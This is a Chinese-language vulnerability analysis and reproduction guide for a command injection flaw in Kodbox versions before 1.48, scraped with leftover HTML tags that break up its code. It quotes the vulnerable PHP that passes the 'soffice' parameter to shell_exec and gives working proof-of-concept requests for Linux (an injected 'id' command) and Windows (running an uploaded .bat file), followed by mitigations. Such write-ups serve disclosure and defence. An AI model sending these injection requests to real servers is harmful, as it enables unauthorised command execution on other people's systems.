Kodbox 1.47 命令注入漏洞分析与复现指南<\/h1>

漏洞概述<\/h2>
Kodbox 是一款功能丰富的私有云在线文档管理系统，可作为网络文件管理器和网页代码编辑器使用。在版本低于1.48的系统中存在一个命令注入漏洞，攻击者可通过精心构造的请求在服务器上执行任意命令。<\/p>
漏洞影响版本<\/strong>：Kodbox < 1.48<\/p>
漏洞文件<\/strong>：`plugins\/officeViewer\/controller\/libreOffice\/index.class.php<\/code><\/p>`
`漏洞类型<\/strong>：命令注入<\/p>`

环境搭建<\/h2> 下载Kodbox 1.47版本源码：<\/p> https:\/\/github.com\/kalcaddle\/kodbox <\/code><\/pre> <\/li> 系统要求：<\/p> PHP版本5以上<\/li> 支持shell_exec函数的环境<\/li> <\/ul> <\/li> <\/ol> 漏洞分析<\/h2> 漏洞代码定位<\/h3> 漏洞主要存在于index.class.php<\/code>文件中的checkBin<\/code>方法：<\/p> private<\/span> function<\/span> checkBin<\/span>($bin, $check) { <\/span><\/span> $code =<\/span> Cache<\/span>::<\/span>get<\/span>($bin); <\/span><\/span> if<\/span>($code) return<\/span> $code; <\/span><\/span> $result =<\/span> shell_exec<\/span>($bin .<\/span> ' --help'<\/span>); \/\/ ' 2>&1' <\/span><\/span><\/span><\/span> $code =<\/span> strstr<\/span>($result, $check) ?<\/span> true<\/span> :<\/span> false<\/span>; <\/span><\/span> Cache<\/span>::<\/span>set<\/span>($bin, $code); <\/span><\/span> return<\/span> $code; <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞触发流程<\/h3> 攻击者通过HTTP请求传入soffice<\/code>参数<\/p> <\/li> 参数值被传递到check()<\/code>方法：<\/p> public<\/span> function<\/span> check<\/span>() { <\/span><\/span> $bin =<\/span> $this-><\/span>in<\/span>['soffice'<\/span>]; \/\/ 从HTTP请求获取soffice参数 <\/span><\/span><\/span><\/span> \/\/ ...省略部分代码... <\/span><\/span><\/span><\/span> if<\/span>(isset<\/span>($_GET['check'<\/span>])){ <\/span><\/span> \/\/ ...省略检查代码... <\/span><\/span><\/span><\/span> $soffice =<\/span> $this-><\/span>getSoffice<\/span>(); <\/span><\/span> } <\/span><\/span> \/\/ ...省略后续代码... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 在Windows环境下，参数会被特殊处理：<\/p> $bin =<\/span> '"'<\/span> .<\/span> trim<\/span>(iconv_system<\/span>($bin)) .<\/span> '"'<\/span>; \/\/ win路径空格处理 <\/span><\/span><\/span><\/code><\/pre><\/li> 最终参数被直接拼接到shell_exec命令中执行<\/p> <\/li> <\/ol> 漏洞利用<\/h2> Linux系统利用<\/h3> POC<\/strong>:<\/p> \/index.php?plugin\/officeViewer\/libreOffice\/index\/check&soffice=";id;%23&check=1 <\/code><\/pre> 解释<\/strong>：<\/p> "<\/code> 用于闭合原有的双引号<\/li> ;<\/code> 用于分隔命令<\/li> id<\/code> 是要执行的命令<\/li> %23<\/code> 是URL编码的#<\/code>，用于注释掉后续内容<\/li> <\/ul> Windows系统利用<\/h3> 前提条件<\/strong>：<\/p> 有权限上传文件到服务器<\/li> 知道可执行文件的绝对路径<\/li> <\/ol> 利用步骤<\/strong>：<\/p> 上传恶意bat文件（如poc.bat）到服务器，内容为任意命令：<\/p> @echo off whoami <\/code><\/pre> <\/li> 构造请求执行bat文件：<\/p> \/index.php?plugin\/officeViewer\/libreOffice\/index\/check&soffice=D:\path\to\poc.bat <\/code><\/pre> <\/li> <\/ol> 防御措施<\/h2> 升级到Kodbox 1.48或更高版本<\/p> <\/li> 临时修复方案：<\/p> 禁用shell_exec函数<\/li> 对用户输入的soffice<\/code>参数进行严格过滤<\/li> 使用escapeshellarg()等函数处理命令参数<\/li> <\/ul> <\/li> 安全配置建议：<\/p> 限制文件上传类型<\/li> 设置文件上传目录不可执行<\/li> 使用最小权限原则运行Web服务<\/li> <\/ul> <\/li> <\/ol> 技术总结<\/h2> 该漏洞的核心问题在于未对用户可控的soffice<\/code>参数进行充分过滤，直接拼接到了shell_exec命令中。在安全开发中，应始终遵循以下原则：<\/p> 所有用户输入都应视为不可信的<\/li> 执行系统命令时应使用白名单机制<\/li> 必要时使用专门的命令转义函数<\/li> 避免直接拼接用户输入到系统命令中<\/li> <\/ol> 通过此漏洞的分析，我们可以更深入地理解命令注入漏洞的原理和利用方式，从而在开发中更好地防范此类安全问题。<\/p>